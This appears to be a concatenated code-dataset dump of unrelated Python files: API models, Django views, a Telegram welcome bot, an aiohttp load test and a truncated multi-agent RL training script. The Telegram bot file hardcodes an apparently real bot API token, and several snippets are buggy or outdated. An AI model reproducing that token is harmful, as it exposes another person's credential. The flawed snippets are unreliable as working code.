z = (x_N2-9.01482074e-01)/1.00892736e-02
output = \
1*3.84349047e+00+\
z*-6.08739732e-03+\
y*4.11578470e-03+\
x*-7.27500334e-04
x_O2 = output*1.00000000e+00+0.00000000e+00
return x_O2 |
23,535 | 928cfbd0c0b98af7d56ba453870d4642c0e1767d | # coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.27.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from pollination_sdk.configuration import Configuration
class Project(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'str',
'id': 'str',
'name': 'str',
'owner': 'AccountPublic',
'permissions': 'UserPermission',
'public': 'bool',
'slug': 'str',
'usage': 'Usage'
}
attribute_map = {
'description': 'description',
'id': 'id',
'name': 'name',
'owner': 'owner',
'permissions': 'permissions',
'public': 'public',
'slug': 'slug',
'usage': 'usage'
}
def __init__(self, description='', id=None, name=None, owner=None, permissions=None, public=True, slug=None, usage=None, local_vars_configuration=None): # noqa: E501
"""Project - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._name = None
self._owner = None
self._permissions = None
self._public = None
self._slug = None
self._usage = None
self.discriminator = None
if description is not None:
self.description = description
self.id = id
self.name = name
self.owner = owner
self.permissions = permissions
if public is not None:
self.public = public
self.slug = slug
if usage is not None:
self.usage = usage
@property
def description(self):
"""Gets the description of this Project. # noqa: E501
A description of the project # noqa: E501
:return: The description of this Project. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Project.
A description of the project # noqa: E501
:param description: The description of this Project. # noqa: E501
:type description: str
"""
self._description = description
@property
def id(self):
"""Gets the id of this Project. # noqa: E501
The project ID # noqa: E501
:return: The id of this Project. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Project.
The project ID # noqa: E501
:param id: The id of this Project. # noqa: E501
:type id: str
"""
if self.local_vars_configuration.client_side_validation and id is None: # noqa: E501
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
@property
def name(self):
"""Gets the name of this Project. # noqa: E501
The name of the project. Must be unique to a given owner # noqa: E501
:return: The name of this Project. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Project.
The name of the project. Must be unique to a given owner # noqa: E501
:param name: The name of this Project. # noqa: E501
:type name: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def owner(self):
"""Gets the owner of this Project. # noqa: E501
The project owner # noqa: E501
:return: The owner of this Project. # noqa: E501
:rtype: AccountPublic
"""
return self._owner
@owner.setter
def owner(self, owner):
"""Sets the owner of this Project.
The project owner # noqa: E501
:param owner: The owner of this Project. # noqa: E501
:type owner: AccountPublic
"""
if self.local_vars_configuration.client_side_validation and owner is None: # noqa: E501
raise ValueError("Invalid value for `owner`, must not be `None`") # noqa: E501
self._owner = owner
@property
def permissions(self):
"""Gets the permissions of this Project. # noqa: E501
:return: The permissions of this Project. # noqa: E501
:rtype: UserPermission
"""
return self._permissions
@permissions.setter
def permissions(self, permissions):
"""Sets the permissions of this Project.
:param permissions: The permissions of this Project. # noqa: E501
:type permissions: UserPermission
"""
if self.local_vars_configuration.client_side_validation and permissions is None: # noqa: E501
raise ValueError("Invalid value for `permissions`, must not be `None`") # noqa: E501
self._permissions = permissions
@property
def public(self):
"""Gets the public of this Project. # noqa: E501
Whether or not a project is publicly viewable # noqa: E501
:return: The public of this Project. # noqa: E501
:rtype: bool
"""
return self._public
@public.setter
def public(self, public):
"""Sets the public of this Project.
Whether or not a project is publicly viewable # noqa: E501
:param public: The public of this Project. # noqa: E501
:type public: bool
"""
self._public = public
@property
def slug(self):
"""Gets the slug of this Project. # noqa: E501
The project name in slug format # noqa: E501
:return: The slug of this Project. # noqa: E501
:rtype: str
"""
return self._slug
@slug.setter
def slug(self, slug):
"""Sets the slug of this Project.
The project name in slug format # noqa: E501
:param slug: The slug of this Project. # noqa: E501
:type slug: str
"""
if self.local_vars_configuration.client_side_validation and slug is None: # noqa: E501
raise ValueError("Invalid value for `slug`, must not be `None`") # noqa: E501
self._slug = slug
@property
def usage(self):
"""Gets the usage of this Project. # noqa: E501
The resource consumption of this project # noqa: E501
:return: The usage of this Project. # noqa: E501
:rtype: Usage
"""
return self._usage
@usage.setter
def usage(self, usage):
"""Sets the usage of this Project.
The resource consumption of this project # noqa: E501
:param usage: The usage of this Project. # noqa: E501
:type usage: Usage
"""
self._usage = usage
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Project):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, Project):
return True
return self.to_dict() != other.to_dict()
|
23,536 | 72e75f6390dad7a6bfef2dd415b56da05a8c8be3 | from scrapy.item import Item, Field
class Bet(Item):
UUID = Field()
record = Field()
bookmaker = Field()
sport = Field()
country = Field()
league = Field()
eventDate = Field()
homeTeam = Field()
awayTeam = Field()
totals = Field()
moneyLine = Field()
spreads = Field()
home = Field()
away = Field()
draw = Field()
over = Field()
under = Field()
hdp = Field()
points = Field()
lastUpdated = Field(serializer=str)
|
23,537 | ee762173ec754d45439adf032d65faa0ee353cc7 | def count_trees(area, dx, dy):
m, n, i, j, trees = len(area), len(area[0]), 0, 0, 0
while (i < m):
trees += (area[i][j] == '#')
i, j = i + dy, (j + dx)%n
return trees
with open("input.txt", "r") as f:
area = [line[:-1] for line in f]
print(count_trees(area, 3, 1))
|
23,538 | 0bbf5d7e559cc2219b2e676a964497e6d602d668 | # -*- coding: utf-8 -*-
#
# Copyright 2016 Continuum Analytics, Inc.
# May be copied and distributed freely only as part of an Anaconda or
# Miniconda installation.
#
"""
"""
# Standard library imports
import os
import sys
import yaml
# Local imports
from anaconda_navigator.config import PROJECT_ENVS_FOLDER, PROJECT_YAML_FILE
from anaconda_navigator.utils.logs import logger
class Project(object):
"""
An Anaconda project.
Developed as part of Anaconda Navigator, details will initially only
include information necessary for UI functions.
"""
keys = ('name', 'default_environment', 'environments', 'commands', 'icon',
'default_channels', 'is_app', 'dev_tool', 'version',
'description', 'is_default', 'is_conda_app')
root = sys.exec_prefix # If someone runs from within an environment?
def __init__(self, **kwargs):
"""
Parameters
----------
name : str
Project name.
description : str
Project description.
default_environment : str
Currently selected env name.
environments : dict
{envname: specfile} set of env specs.
commands : list of str
[strings] executables.
default_channels : list of str
[strings] default channels for conda packages.
is_app :bool
regard as app?
dev_tool : bool
Whether can run other environments.
icon : str
Path to icon PNG file.
is_default : bool
Defines if the project is the default project.
"""
self.name = 'default'
self.description = ""
self.default_channels = []
self.version = "0.0.1"
self.default_environment = 'default'
self.environments = {'default': 'env.yaml'}
self.commands = []
self.icon = None
# Ui client specifc
self.is_default = False
self.is_conda_app = False
self.dev_tool = None
# Is this redundant? having an endpoint should imply this?
self.is_app = False
for key, val in kwargs.items():
setattr(self, key, val)
def __getitem__(self, item, default=None):
return getattr(self, item, default)
return getattr(self, item)
get = __getitem__
def __repr__(self):
return str(self.to_dict())
def to_dict(self):
"""
Dictionary representation of this project.
"""
return {key: getattr(self, key) for key in self.keys}
def save(self, path):
"""
Write project details to file.
"""
logger.debug(path)
if not os.path.isdir(path):
os.makedirs(path)
data = yaml.safe_dump(self.to_dict(), default_flow_style=False)
file_path = os.sep.join([path, PROJECT_YAML_FILE])
with open(file_path, 'w') as f:
f.write(data)
def env_prefix(self, path):
"""
If this project is at path, what's the current env prefix?.
"""
if self.is_default:
return self.root # FIXME: Is this guaranteed to be the right one?
return os.sep.join([path, PROJECT_ENVS_FOLDER,
self.default_environment])
def test():
pass
if __name__ == '__main__':
test()
|
23,539 | f0412a4dc42a0e278690bdd1160ca8daef7791f1 | from twx.botapi import TelegramBot, ReplyKeyboardMarkup
import os
import datetime
import random
import emoji
import socket
import sys
"""
Setup the bot
"""
bot = TelegramBot('808550713:AAHkkh0LkkfX3-j2pHFGED0AEuINIKq-ZnY')
print (bot)
bot.update_bot_info().wait()
last_id = 0
print(bot.username)
TELEGRAM_MSGID=0;
TELEGRAM_MSG=1;
"""
Setting up Sensesurround server address
"""
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 10002)
#print >>sys.stderr, 'connecting to SS via port %s %s' % server_address
#sock.connect(server_address)
"""
Send a message to a user
"""
#create objects first
updates = bot.get_updates(offset= last_id, timeout=600).wait()
msg = updates[len(updates)-1][TELEGRAM_MSG]
#result = bot.send_message(user_id, 'test message body').wait()
#print(result)
"""
Get updates sent to the bot
"""
pmsg = 'jbufs'
welcome_list = ['Welcome to SNPS! ' + emoji.emojize(":grinning_face_with_big_eyes:"), 'SNPS welcomes you! ' + emoji.emojize("\xF0\x9F\x8D\xBB"), 'Irasshaimase! ' + emoji.emojize("\xF0\x9F\x87\xAF\xF0\x9F\x87\xB5"), 'Hwan-Yeong! ' + emoji.emojize("\xF0\x9F\x87\xB0\xF0\x9F\x87\xB7")]
while True:
updates = bot.get_updates(offset= last_id, timeout=600).wait()
if updates is not None:
if len(updates) > 0:
msg = updates[len(updates)-1][TELEGRAM_MSG]
chat= msg.chat
encodedtext = msg.text
if encodedtext is not None:
encodedtext.encode(encoding='utf-8',errors='ignore')
#print encodedtext.encode('utf-8')
encodedpmsg = pmsg
if encodedpmsg is not None:
encodedpmsg.encode(encoding='utf-8',errors='ignore')
#print encodedpmsg.encode('utf-8')
if pmsg is not msg.text:
#if encodedpmsg is not None:
#print encodedpmsg.encode('utf-8')
if len(updates) >= 0:
last_id = int(updates[len(updates)-1][TELEGRAM_MSGID])+1
if msg.text is not None:
if "adding" in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "Adding" in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "Let's welcome" in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "lets welcome" in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "Lets welcome" in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "let's welcome" in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "Welcome " in msg.text:
bot.send_message(msg.chat.id, random.choice(welcome_list))
elif "All the best" in msg.text:
bot.send_message(msg.chat.id, "Good Luck..." + "\xF0\x9F\x98\x94")
elif "Farewell" in msg.text:
bot.send_message(msg.chat.id, "Good Bye..." + "\xF0\x9F\x98\x9E")
elif "Take care" in msg.text:
bot.send_message(msg.chat.id, "All the best.." + "\xF0\x9F\x99\x8F")
elif "SS weather" in msg.text:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print >>sys.stderr, 'connecting to SS via port %s %s' % server_address
sock.connect(server_address)
print >>sys.stderr, 'sending "%s"' % msg.text
sock.sendall(msg.text)
while True:
data = sock.recv(16)
print >>sys.stderr, 'received "%s"' % data
if data:
print >>sys.stderr, 'sending "%s" to TG' % data
bot.send_message(msg.chat.id, data)
else:
print >>sys.stderr, 'no more data from SS'
sock.close()
break
elif "SS temperature" in msg.text:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print >>sys.stderr, 'connecting to SS via port %s %s' % server_address
sock.connect(server_address)
print >>sys.stderr, 'sending "%s"' % msg.text
sock.sendall(msg.text)
while True:
data = sock.recv(16)
print >>sys.stderr, 'received "%s"' % data
if data:
print >>sys.stderr, 'sending "%s" to TG' % data
bot.send_message(msg.chat.id, data)
else:
print >>sys.stderr, 'no more data from SS'
sock.close()
break
pmsg=msg.text
|
23,540 | 7b5d8b64d4db94834cbc0e9182d494c1cba7c374 | # -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: __init__.py
Description :
Author: jiangfb
date: 2021-06-23
-------------------------------------------------
Change Activity:
2021-06-23:
-------------------------------------------------
"""
__author__ = 'jiangfb'
|
23,541 | 201bd8e0c439acd8e10847460b89fd459ca293ea | # nuemeric data types int float and complex
integer_var=-1
float_var=1.0
complex_var=1+2j
print(type(integer_var),type(float_var),type(complex_var),sep="\n")
# playing with list
# creating an empty list
list_var=[]
# creating a list with some values
list_var2=[1,2,'a']
# adding elements to a list
list_var2.append(4)
# adding elements to a list dynamically
for i in range(5):
list_var.append(i)
print(list_var)
print(list_var2)
# removing last element from the list
list_var.pop()
print(list_var)
# removing an element at particular index
list_var.pop(2)
print(list_var)
# removing a given element
list_var2.remove('a')
print(list_var2)
# updating an element at particular index
list_var2[0]='ab'
print(list_var2)
# merging to lists
list_var.extend(list_var2)
print(list_var)
# insert a value at particular index
list_var.insert(1,"new")
print(list_var)
# getting the length or size of the list
print(len(list_var))
# clearing the list
list_var2.clear()
# deleting values at particular index range
del list_var[0:3]
print(list_var)
# nested list
list_var.append([2,3,4,5,6,7,9])
print(list_var)
# traversing over a list
for i in list_var:
print(i)
for i in range(0,len(list_var)):
print(list_var[i])
|
23,542 | 2c9a162d4a45716f93c3f43f6377bdb3dd626759 | from django.db import models
class Product(models.Model):
pid=models.IntegerField()
pname=models.CharField(max_length=30)
pcost=models.DecimalField(max_digits=10,decimal_places=2)
pmfdt=models.DateField()
pexpdt=models.DateField()
|
23,543 | 9bf55657937ba3d6e7d1e4225ff3bae3df3a6ab2 | import aiohttp
import asyncio
import subprocess
import typing
import uuid
async def wait_for_url(client: aiohttp.ClientSession, url: str, method: str):
while True:
try:
async with client.options(url) as response:
if method in response.headers['Allow']:
return
except aiohttp.ClientConnectorError:
pass
await asyncio.sleep(0.1)
async def task_producer_run(client: aiohttp.ClientSession, task_type: str, task_payload):
async with client.post('http://localhost:8080/task/run', params={'taskType': task_type}, json=task_payload) as response:
assert response.status == 200
assert await response.json() == task_payload
async def worker_task_gettersetter(client: aiohttp.ClientSession, task_types: typing.List[str], timeout: int):
async with client.get('http://localhost:8080/task/get', headers={'Prefer': f'wait={timeout}'}, params={'taskType': task_types}) as response:
assert response.status == 200
task_payload = await response.json()
async with client.post('http://localhost:8080/result/set', params={'taskId': task_payload['taskId']}, json=task_payload['payload']) as response:
assert response.status == 200
async def test_many_tasks_many_workers_steps(test_steps):
process = subprocess.Popen(['task-router'])
try:
async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(limit=None, limit_per_host=0)) as client:
# wait for server to become ready
await wait_for_url(client, 'http://localhost:8080/task/run', 'POST')
task_type = 'task-type-under-test'
producer_tasks = []
worker_tasks = []
for type, amount in test_steps:
print(f'Creating {amount} {type}s...')
if type == 'producer':
for _ in range(amount):
producer_tasks.append(
asyncio.create_task(
task_producer_run(
client,
task_type,
str(uuid.uuid4()),
),
),
)
elif type == 'worker':
for _ in range(amount):
worker_tasks.append(
asyncio.create_task(
worker_task_gettersetter(
client,
[task_type],
60,
),
),
)
print(f'Awaiting {len(producer_tasks) + len(worker_tasks)} tasks...')
assert len(producer_tasks) == len(worker_tasks)
for task in worker_tasks + producer_tasks:
await task
print(f'Awaited {len(producer_tasks) + len(worker_tasks)} tasks.')
finally:
try:
assert process.poll() is None # process is still running
process.terminate()
finally:
process.wait()
async def test_many_tasks_many_workers():
for factor in [1, 10, 33]:
print('factor:', factor)
await test_many_tasks_many_workers_steps(
[
('producer', 3 * factor),
('producer', 3 * factor),
('worker', 5 * factor),
('producer', 3 * factor),
('producer', 3 * factor),
('worker', 5 * factor),
('producer', 3 * factor),
('worker', 5 * factor),
],
)
await test_many_tasks_many_workers_steps(
[
('worker', 5 * factor),
('producer', 3 * factor),
('worker', 5 * factor),
('producer', 3 * factor),
('producer', 3 * factor),
('worker', 5 * factor),
('producer', 3 * factor),
('producer', 3 * factor),
],
)
await test_many_tasks_many_workers_steps(
[
('producer', 5 * factor),
('worker', 3 * factor),
('producer', 5 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('producer', 5 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
],
)
await test_many_tasks_many_workers_steps(
[
('worker', 3 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('producer', 5 * factor),
('producer', 5 * factor),
('producer', 5 * factor),
],
)
await test_many_tasks_many_workers_steps(
[
('producer', 5 * factor),
('producer', 5 * factor),
('producer', 5 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
('worker', 3 * factor),
],
)
|
23,544 | b083769182fd9244967bdec69621e5a7f5926441 | from django.urls import path, include
from .views import *
urlpatterns = [
path('college/list', CollegeListView.as_view(), name="college list"),
path('college/add/edit', CollegeAddEdit.as_view(), name="college add"),
path('college/delete', CollegeDelete.as_view(), name="college delete"),
path('college/details', CollegeDetail.as_view(), name="college detail"),
# path('college/statuschange', CollegeStatusChange.as_view(), name="college status change"),
] |
23,545 | a2c1d9434a7eeb8e92443d4515c3363227d97829 | import operator
import re
import copy
from functools import reduce
from django.db.models import Q, Case, When, Value, IntegerField
from django.db.models.functions import Lower, Substr
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render
from django.shortcuts import render
from django.views.generic import CreateView, DetailView, ListView, UpdateView
from rest_framework import serializers
from classes.models import Department, Class
from fcq.models import Professor, FCQ
from .forms import SearchForm
from .serializers import ProfessorSerializer
# Create your views here.
def fcq_search(request):
ctx = {}
ctx["form"] = SearchForm()
return render(request, "fcq/fcq_search.html", ctx)
def fcq_search_ajax(request):
if request.method == "GET":
get = request.GET.get
else:
get = request.POST.get
keyword = get("keyword", "")
keyword = re.split("\W", keyword)
professors = Professor.objects.filter(
reduce(
operator.and_,
((Q(firstName__icontains=x) | Q(lastName__icontains=x)) for x in keyword),
)
)
department = get("department")
if department:
department_obj = Department.objects.filter(code__iexact=department).first()
if not department_obj:
# return no results if department is not found
return JsonResponse({})
else:
professors = professors.filter(
fcqs__course__department__code=department
).distinct()
number = get("number")
if number:
number = int(number)
print(type(number), number)
professors = professors.filter(fcqs__course__course_subject=number)
# profList = fcq_obj.order_by().values_list("professor").distinct()
# professors = Professor.objects.filter(id__in=profList).order_by("lastName")
response = ProfessorSerializer(professors, many=True)
return JsonResponse(response.data, safe=False)
def view_professor(request, professor_id):
ctx = {}
professor_id = int(professor_id) # fix parameter type
professor_obj = get_object_or_404(
Professor, id=professor_id
) # get professor object
# get professor's basic info
professorID = professor_obj.id
ctx["professor_id"] = professor_obj.id
ctx["firstName"] = professor_obj.firstName
ctx["lastName"] = professor_obj.lastName
# get all fcqs for professor
fcq = FCQ.objects.filter(professor_id=professorID)
count = len(fcq)
if count != 0: # avoid a divide by zero
students = 0
effect = 0.0
rating = 0.0
course = 0.0
chal = 0.0
learn = 0.0
for fcq_obj in fcq:
students += fcq_obj.size
effect += fcq_obj.profEffect
rating += fcq_obj.profRating
course += fcq_obj.courseRating
chal += fcq_obj.challenge
learn += fcq_obj.learned
students = int(students / count)
effect = round(effect / count, 2)
rating = round(rating / count, 2)
course = round(course / count, 2)
chal = round(chal / count, 2)
learn = round(learn / count, 2)
ctx["numClasses"] = count
ctx["avgSize"] = students
ctx["avgEffect"] = effect
ctx["avgRating"] = rating
ctx["avgCourse"] = course
ctx["avgChal"] = chal
ctx["avgLearn"] = learn
stars = (effect + rating + learn) / 3
if effect - chal < 0:
stars += effect - chal
ctx["stars"] = stars
fcq = fcq.annotate(
custom_order=Case(
When(semester="Spring", then=Value(1)),
When(semester="Summer", then=Value(2)),
When(semester="Fall", then=Value(3)),
output_field=IntegerField(),
)
).order_by("-year", "-custom_order")
ctx["fcq"] = fcq
department_obj = (
fcq.order_by().values_list("course__department__name").distinct()
)
departments = [x[0] for x in department_obj]
deps = [["department", "count"]]
for dep in departments:
count = len(fcq.filter(course__department__name=dep))
holder = [dep, count]
deps.append(holder)
ctx["pieData"] = deps
subject_obj = fcq.order_by().values_list("course__course_subject").distinct()
subjects = [x[0] for x in subject_obj]
subCount = []
for sub in subjects:
subCount.append(len(fcq.filter(course__course_subject=sub)))
return render(request, "fcq/professor_detail.html", ctx)
|
23,546 | 872ce41f26dc44c6624b6dca24cbb078a6982592 | CustomError = 'Error'
def test() :
raise 'Error'
try :
test()
except CustomError :
print("Error!")
|
23,547 | 40c4ab490c868b7d0f4834b5ee97f22edcffffe1 | """
Training funcion for the Coin Game.
"""
import os
import numpy as np
import tensorflow as tf
import pdb
from . import logger
from .corrections import *
from .networks import *
from .utils import *
def update(mainPN, lr, final_delta_1_v, final_delta_2_v):
update_theta_1 = mainPN[0].setparams(
mainPN[0].getparams() + lr * np.squeeze(final_delta_1_v))
update_theta_2 = mainPN[1].setparams(
mainPN[1].getparams() + lr * np.squeeze(final_delta_2_v))
def update_single(PN, lr, final_delta_v):
update_theta_1 = PN.setparams(
PN.getparams() + lr * np.squeeze(final_delta_v))
def clone_update(mainPN_clone):
for i in range(2):
mainPN_clone[i].log_pi_clone = tf.reduce_mean(
mainPN_clone[i].log_pi_action_bs)
mainPN_clone[i].clone_trainer = \
tf.train.GradientDescentOptimizer(learning_rate=0.1)
mainPN_clone[i].update = mainPN_clone[i].clone_trainer.minimize(
-mainPN_clone[i].log_pi_clone, var_list=mainPN_clone[i].parameters)
def train(env, *, num_episodes, trace_length, batch_size,
corrections, opp_model, grid_size, gamma, hidden, bs_mul, lr,
welfare0, welfare1, punish=False,
mem_efficient=True, num_punish_episodes=1000):
#Setting the training parameters
batch_size = batch_size #How many experience traces to use for each training step.
trace_length = trace_length #How long each experience trace will be when training
y = gamma
num_episodes = num_episodes #How many episodes of game environment to train network with.
load_model = False #Whether to load a saved model.
path = "./drqn" #The path to save our model to.
n_agents = env.NUM_AGENTS
total_n_agents = n_agents
h_size = [hidden] * total_n_agents
max_epLength = trace_length+1 #The max allowed length of our episode.
summary_len = 20 #Number of episodes to periodically save for analysis
tf.reset_default_graph()
mainPN = []
mainPN_step = []
coopPN = []
coopPN_step = []
punishPN = []
punishPN_step = []
agent_list = np.arange(total_n_agents)
for agent in range(total_n_agents):
mainPN.append(
Pnetwork('main' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size,))
mainPN_step.append(
Pnetwork('main' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size,
reuse=True, step=True))
# Clones of the opponents
if opp_model:
mainPN_clone = []
for agent in range(total_n_agents):
mainPN_clone.append(
Pnetwork('clone' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size))
if punish: # Initialize punishment networks and networks for tracking cooperative updates
for agent in range(total_n_agents):
punishPN.append(Pnetwork('punish' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size, ))
punishPN_step.append(Pnetwork('punish' + str(agent), h_size[agent], agent, env,
trace_length=trace_length, batch_size=batch_size,
reuse=True, step=True))
coopPN = Pnetwork('coop' + str(1), h_size[1], 1, env,
trace_length=trace_length, batch_size=batch_size, )
coopPN_step = Pnetwork('coop' + str(1), h_size[1], 1, env,
trace_length=trace_length, batch_size=batch_size,
reuse=True, step=True)
if not mem_efficient:
cube, cube_ops = make_cube(trace_length)
else:
cube, cube_ops = None, None
if not opp_model:
corrections_func(mainPN, batch_size, trace_length, corrections, cube)
corrections_func(punishPN, batch_size, trace_length, corrections, cube)
if punish:
corrections_func_single(coopPN, batch_size, trace_length)
else:
corrections_func([mainPN[0], mainPN_clone[1]],
batch_size, trace_length, corrections, cube)
corrections_func([mainPN[1], mainPN_clone[0]],
batch_size, trace_length, corrections, cube)
corrections_func([mainPN[1], mainPN_clone[0]],
batch_size, trace_length, corrections, cube)
clone_update(mainPN_clone)
init = tf.global_variables_initializer()
# saver = tf.train.Saver(max_to_keep=5)
trainables = tf.trainable_variables()
#create lists to contain total rewards and steps per episode
jList = []
rList = []
aList = []
total_steps = 0
has_defected = False
time_to_punish = False
# Make a path for our model to be saved in.
if not os.path.exists(path):
os.makedirs(path)
episodes_run = np.zeros(total_n_agents)
episodes_run_counter = np.zeros(total_n_agents)
episodes_reward = np.zeros((total_n_agents, batch_size))
episodes_actions = np.zeros((total_n_agents, env.NUM_ACTIONS))
pow_series = np.arange(trace_length)
discount = np.array([pow(gamma, item) for item in pow_series])
discount_array = gamma**trace_length / discount
discount = np.expand_dims(discount, 0)
discount_array = np.reshape(discount_array,[1,-1])
with tf.Session() as sess:
# if load_model == True:
# print( 'Loading Model...')
# ckpt = tf.train.get_checkpoint_state(path)
# saver.restore(sess, ckpt.model_checkpoint_path)
sess.run(init)
if not mem_efficient:
sess.run(cube_ops)
sP = env.reset()
updated =True
for i in range(num_episodes):
a0_defected = False
a1_defected = False
episodeBuffer = []
for ii in range(n_agents):
episodeBuffer.append([])
np.random.shuffle(agent_list)
if n_agents == total_n_agents:
these_agents = range(n_agents)
else:
these_agents = sorted(agent_list[0:n_agents])
#Reset environment and get first new observation
sP = env.reset()
s = sP
trainBatch0 = [[], [], [], [], [], []]
trainBatch1 = [[], [], [], [], [], []]
coopTrainBatch1 = [[], [], [], [], [], []]
d = False
rAll = np.zeros((4))
aAll = np.zeros((env.NUM_ACTIONS * 2))
j = 0
# ToDo: need to track lstm states for main and punish nets
lstm_state = []
for agent in these_agents:
episodes_run[agent] += 1
episodes_run_counter[agent] += 1
lstm_state.append(np.zeros((batch_size, h_size[agent]*2)))
if punish:
lstm_coop_state = np.zeros((batch_size, h_size[1]*2))
while j < max_epLength:
lstm_state_old = lstm_state
if punish: lstm_coop_state_old = lstm_coop_state
j += 1
a_all = []
lstm_state = []
lstm_punish_state = []
for agent_role, agent in enumerate(these_agents):
# Actual actions and lstm states
# ToDo: separate lstm state for punish nets
if punish and time_to_punish:
a, lstm_punish_s = sess.run(
[
punishPN_step[agent].predict,
punishPN_step[agent].lstm_state_output
],
feed_dict={
punishPN_step[agent].state_input: s,
punishPN_step[agent].lstm_state: lstm_state_old[agent]
}
)
lstm_state.append(lstm_s)
a_all.append(a)
else:
a, lstm_s = sess.run(
[
mainPN_step[agent].predict,
mainPN_step[agent].lstm_state_output
],
feed_dict={
mainPN_step[agent].state_input: s,
mainPN_step[agent].lstm_state: lstm_state_old[agent]
}
)
lstm_state.append(lstm_s)
a_all.append(a)
# Cooperative actions and lstm states
if punish and agent == 1: # Assuming only agent 1 can be non-cooperative
a_coop, lstm_s_coop = sess.run(
[
coopPN_step.predict,
coopPN_step.lstm_state_output
],
feed_dict={
coopPN_step.state_input: s,
coopPN_step.lstm_state: lstm_coop_state_old
}
)
lstm_coop_state = lstm_s_coop
a_coop_all = a_coop
# ToDo: make sure the policies which are being compared are deterministic (i.e. account for
# ToDo: random seed where necessary
if punish and not time_to_punish and not has_defected:
if np.array_equal(a_coop, a_all[1]):
has_defected = False
else:
has_defected = True
# ToDo: need separate trainBatch for punishment?
# Add obs for policy network
trainBatch0[0].append(s)
trainBatch1[0].append(s)
trainBatch0[1].append(a_all[0])
trainBatch1[1].append(a_all[1])
# Add obs for coop network
# ToDo: update coop only if has_defected == False?
if punish:
coopTrainBatch1[0].append(s)
coopTrainBatch1[1].append(a_all[1])
a_all = np.transpose(np.vstack(a_all))
s1P,r,d = env.step(actions=a_all)
s1 = s1P
trainBatch0[2].append(r[0])
trainBatch1[2].append(r[1])
trainBatch0[3].append(s1)
trainBatch1[3].append(s1)
trainBatch0[4].append(d)
trainBatch1[4].append(d)
trainBatch0[5].append(lstm_state[0])
trainBatch1[5].append(lstm_state[1])
if punish:
coopTrainBatch1[2].append(s1) # Coop train batch doesn't have entry for rewards b/c welfare function
coopTrainBatch1[3].append(d)
coopTrainBatch1[4].append(lstm_coop_state)
total_steps += 1
for agent_role, agent in enumerate(these_agents):
episodes_reward[agent] += r[agent_role]
for index in range(batch_size):
r_pb = [r[0][index], r[1][index]]
if np.array(r_pb).any():
if r_pb[0] == 1 and r_pb[1] == 0:
rAll[0] += 1
elif r_pb[0] == 0 and r_pb[1] == 1:
rAll[1] += 1
elif r_pb[0] == 1 and r_pb[1] == -2:
rAll[2] += 1
elif r_pb[0] == -2 and r_pb[1] == 1:
rAll[3] += 1
aAll[a_all[0]] += 1
aAll[a_all[1] + 4] += 1
s_old = s
s = s1
sP = s1P
if d.any():
break
jList.append(j)
rList.append(rAll)
aList.append(aAll)
# training after one batch is obtained
sample_return0 = np.reshape(
get_monte_carlo(trainBatch0[2], y, trace_length, batch_size),
[batch_size, -1])
sample_return1 = np.reshape(
get_monte_carlo(trainBatch1[2], y, trace_length, batch_size),
[batch_size, -1])
if punish and time_to_punish:
sample_return0 = -sample_return1
else:
sample_return0 = welfare0(sample_return0, sample_return1)
sample_return1 = welfare1(sample_return1, sample_return0)
# need to multiple with
pow_series = np.arange(trace_length)
discount = np.array([pow(gamma, item) for item in pow_series])
sample_reward0 = discount * np.reshape(
trainBatch0[2] - np.mean(trainBatch0[2]), [-1, trace_length])
sample_reward1 = discount * np.reshape(
